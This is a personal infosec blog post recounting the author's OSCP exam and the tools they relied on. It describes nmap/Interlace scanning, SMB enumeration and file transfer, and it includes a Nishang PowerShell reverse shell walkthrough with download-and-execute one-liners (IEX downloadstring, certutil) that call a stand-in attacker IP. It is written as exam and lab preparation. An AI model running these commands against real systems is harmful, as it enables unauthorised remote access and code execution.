cyb3rdan.com Another infosec blog

OSCP

oscp

Well it’s been a while and even though I thought I would update here during my OSCP journey, study as well as life in general got in the way; so this is going to be a big update. Thankfully though, all that time spent away was well worth it since I did manage to pass the exam on the first attempt, after managing to get the flags on all lab machines. This was definitely one of the most amazing experiences of my life and I could not recommend it more for anyone else that is thinking about starting their OSCP journey.

The exam

My exam was proctored. The proctors were respectful, and never had any issues when I wanted to take a break. I did have to restart the webcam feed a few times during the process, but it was as simple as a quick refresh of the webpage and away it went again. I was using MacBook Pros for both my host machine and the webcam machine, since I had read previous recommendations to split these roles onto different machines due to the resource usage of the webcam application. This seemed to be good advice since the webcam machine did seem to be struggling more than my attacking machine at different periods, with the fan getting quite loud at times.

The tools

There are so many alternatives out there that will help you accomplish what the tools listed below can do, however these are the key tools that I used to get me through the OSCP labs and exam, and I found them all invaluable throughout my journey.

Microsoft OneNote

I didn’t spend a lot of time investigating note taking applications prior to taking the PWK course, since I use OneNote already on a daily basis, and having the ability to sync to a number of devices including mobile devices, I really didn’t feel like I needed to go elsewhere. The one thing I did spend some time on prior to starting the course was creating a template that I could use for each host I exploit to dump all of my enumeration and recon notes. I ended up coming across a blog post solving the same issue for VulnHub and HackTheBox machines, and after running through a few of the lab machines with this template, I found it perfect for what I wanted. You can grab the template at https://maikthulhu.github.io/2017-11-20-onenote-layout/.

I did make a few minor changes to it after a little while. The first was renaming the General Notes section to Walkthrough and from there I would basically copy and paste the entire walkthrough, including all screenshots, straight in to the OSCP lab/exam report and know that I would only have to make minor formatting changes once it was inside Microsoft Word. Then finally, I added a new page called Enumeration Scripts, which had a number of sub-pages where I could paste the output of scripts like LinEnum, LinuxPrivChecker, Sherlock, Watson, JAWS and Windows Exploit Suggester.

NMAP

This is an obvious addition to the list and paired with another awesome tool Interlace, which I will cover next, it makes for an amazing enumeration tool. I always start with some 3 basic scans first. These are:

nmap -Pn -v -sC -sV -oN nmap/initial $ip
nmap -Pn -v -p- -oN nmap/tcp-allports $ip
nmap -Pn -sU --top-ports 50 -oN nmap/udp-top-50 $ip

where:
-Pn skips host discovery and assumes the target is online
-v provides verbose output so you can see the scanning results immediately
-sC scan using the NSE scripts in the default category. You can determine these using nmap --script-help default
-sV determines service/version info
-oN output the results in standard NMAP format -p- scan all 65535 ports
-sU --top-ports 50 UDP scan of only the top 50 ports
$ip is the target IP address to scan

Once these scans have completed you will have all the information you need in order to begin your targeted enumeration. You may find yourself doing 2 more final scans if the TCP all ports scan returns additonal ports. For these I simply keep the same syntax as the first scan, and add the -p option followed by the comma delimited addtional ports found to complete service detection and default NSE script scanning.

Interlace

Due to the time pressures of the OSCP exam I needed a way to run my nmap scans automatically for the machines assigned to me, and there was no way that I wanted a huge number of console windows open with a single command running in each. To the rescue came Interlace. After reading an awesome blog post by HakLuke, which you can find here, I decided that Interlace was exactly what I was after. While my usage was extremely simple, it worked exactly as I had hoped. My setup was as follows:

  • create nmap-commands.txt file inside of ~/Desktop/OSCP/exam/scripts/commands/ with the following contents.
nmap -Pn -sC -sV -oN _output_/_target_-initial.txt _target_
nmap -Pn -p- -oN _output_/_target_-tcp-allports.txt _target_
nmap -Pn -sU --top-ports 50 -oN _output_/_target_-udp-top50.txt _target_
  • Create targets.txt file inside of ~/Desktop/OSCP/exam/scripts/targets/ with the IP addresses of the hosts assigned to me; 1 per line.
1.1.1.1
2.2.2.2
3.3.3.3
4.4.4.4
5.5.5.5
  • Use Interlace to run ALL nmap commands on ALL targets at the same time.
interlace -tL ~/Desktop/OSCP/exam/scripts/targets/targets.txt -o ~/Desktop/OSCP/exam/scripts/output -cL ~/Desktop/OSCP/exam/scripts/commands/nmap-commands.txt -threads 20

Nishang Invoke-PowerShellTcp.ps1

So you’ve managed to get code execution on your target machine through a vulnerability in a web application. You’ve confirmed your target machine is running PowerShell and you want to get a reverse shell. Invoke-PowerShellTcp.ps1 is the perfect tool to get you that shell!

In the following example we are using 1.2.3.4 as the IP address of your Kali machine.

Edit the script
Edit the script in your favourite editor and add the following at the very bottom under all existing content. This will mean that as soon as you call the script in the next stage, you will get your reverse shell instantly without having to call the Invoke-PowerShellTcp function after you call the script. You can change port 443 to whatever port you wish to send the reverse shell to on your Kali machine.

Invoke-PowerShellTcp -Reverse -IPAddress 1.2.3.4 -Port 443

Serve the script on Kali via HTTP

python3 -m http.server 80

Start up a netcat listener on Kali

nc -lvnp 443

Run the script from your vulnerable web application

powershell.exe IEX(new-object net.webclient).downloadstring('http://1.2.3.4/Invoke-PowerShellTcp.ps1')

32 or 64-Bit process?
When run on a 32-bit target machine the above command calling powershell.exe will obviously result in a 32-Bit process, but when you run the same command on a 64-Bit machine, you will still end up with a 32-Bit process. In order to end up with a 64-Bit process you must specify the full path to the 64-Bit PowerShell binary, which can be called using:

c:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(new-object net.webclient).downloadstring('http://1.2.3.4/Invoke-PowerShellTcp.ps1')

Once you have a reverse shell you can run the following command to determine if your shell is 32 or 64-Bit.

[Environment]::Is64BitProcess

If your shell is running under a 64-Bit process the result will be True, otherwise the result will be False.

This is extremely handy to know as when you start running tools such as Sherlock or Watson to look for privilege escalation vulnerabilites, you may find you get different results under a 32-bit process as you do under a 64-Bit process. Make sure to run these scripts within each so that you don’t miss out on an obvious privesc!

Certutil

Need to download and save a file from a webserver to your target Windows machine once you have code execution or a reverse shell? The certutil binary was my goto for this, and it is as simple as the below command.

certutil -urlcache -split -f http://1.2.3.4/file-to-download.exe c:\users\public\downloads\file.exe

Impacket smbserver.py

Impacket smbserver.py was such a lifesaver throughout this whole process when it comes to Windows based target machines, and while the PWK material was great and offered a bunch of solutions for transferring files, this impacket tool made file transfers a no brainer and this is exactly what you need during the exam.

Rather than have to echo a bunch of commands into a file in order to complete an FTP transfer, or even having to install and configure a TFTP server on your Kali machine, this simple one liner spins up an SMB server on your Kali machine in a directory you specify that allows you to simply use the built-in copy command inside of Windows in order to copy files between machines.

Installing the impacket tools

cd /opt
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
pip3 install -r requirements.txt
python3 setup.py install

Once you have installed the tools they will be present in your PATH so you will be able to execute them without needing to specify the full path. You will see in the following example that I like to use a full stop or period to specify starting the server in my current working directory, which makes this as simple as using the python HTTP server to transfer to and from a Windows machine, python3 -m http.server 80.

Starting the server

smbserver.py insert-share-name-here . -smb2support

Copying from windows
For this example we will use the IP address 1.2.3.4 to represent our Kali machine that is running the SMB server. This assumes that you have write access to the destination directory, and that you are in the directory that you want to copy the file to.

copy \\1.2.3.4\insert-share-name-here\nc.exe .

That’s it! Taking this one step further, once you have the SMB server running you can execute binaries or powershell scripts directly from this file share by using the UNC path, without having to write them to disk on your target machine.

smbver.sh

One of the first things I noticed when I loaded the PWK 2018.3 Kali VM and begun enumerating the first SMB port on a remote target was that tools such as NMAP and enum4linux did not return the version of samba that was running on the target. There are a buch of posts on the Internet talking about this, and thanks to a blog post by 0xdf I stumbled across the following bash script. You can find the orignal post on smb enumeration here.

#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
sleep 0.5 && echo ""

It will return a result that looks similar to:

UnixSamba 227a

This output simply means version 2.2.7a and from this you can use something like SearchSploit or go direct to exploit-db.com in order to search for known exploits.

smbmap

Once you have run nmap and discovered that port TCP 139 or 445 is open, there are a number of different tools that you can go to to enumerate SMB. While you can always fall back to smbclient to complete your enumeration with something like smbclient -L \\1.2.3.4, I found that once I had identified an open share that I would always want to at least list the contents of that share. With smbmap you can do it all. I would normally run the following commands:

smbmap -H 1.2.3.4 -u anonymous  

smbmap -H 1.2.3.4 /share -R 

OBS Studio

While not an offensive tool, OBS Studio was still a massive help for me during my exam. I had read a few comments about others asking the proctors if they were allowed to record their own screens during the exam, so in the event you realise you missed a screenshot when you are writing your report, you are able to jump back through the recording and get your missing screenshot. I asked the proctors if this was allowed, and while they said yes, it came with a recommendation to delete the recording immediately once the report had been sumbitted. The last thing you want is for a full 24hr feed of your exam to end up in the hands of someone else and cause you to lose your certification, so I deleted mine immediately as per the recommendation.

I chose to use OBS Studio for this as it is open source, offers flexibility regarding output file formats and supports all major operating systems.

It turns out I only used my recording once, and it was not a critical screenshot, but it was nice knowing I had the recording just in case.

The Summary

As I said at the beginning, this process was absolutely amazing and I would definitely recommend it to anyone considering getting their OSCP. For everyone postponing signing up for their labs, there is really no good time to start this process, unless you can commit 100% of your time to it. It will consume all of your free time and you will spend less time with your family and friends. Just start the process and make it work for you. I had 90 days of lab access, while still working full time, and while I probably didn’t need that long it really did help me to pace myself and not get completely burnt out, while not abandoning my family entirely. Thankfully I do have an awesome wife and daughter who were super supportive throughout the entire process and I have no doubt that without their support there is no way that I would’ve passed on my first attempt.